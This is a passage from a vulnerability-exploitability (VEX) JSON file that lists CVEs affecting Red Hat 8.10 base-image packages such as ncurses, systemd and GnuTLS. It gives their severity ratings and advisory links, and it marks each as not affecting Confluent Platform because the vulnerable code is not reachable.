          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-39537",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-39537"
        },
        {
          "url": "http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/28"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/41"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/43"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2022/Oct/45"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-39537"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00004.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2020-08/msg00006.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2021-10/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39537"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230427-0012/"
        },
        {
          "url": "https://support.apple.com/kb/HT213443"
        },
        {
          "url": "https://support.apple.com/kb/HT213444"
        },
        {
          "url": "https://support.apple.com/kb/HT213488"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-39537"
        }
      ],
      "published": "2021-09-20T16:15:12+00:00",
      "updated": "2026-07-27T13:43:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-3997",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-3997"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-3997"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997"
        },
        {
          "url": "https://security.gentoo.org/glsa/202305-15"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5226-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-3997"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2022/01/10/2"
        }
      ],
      "published": "2022-08-23T20:15:08+00:00",
      "updated": "2026-06-17T04:06:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-4209",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-4209"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-4209"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568"
        },
        {
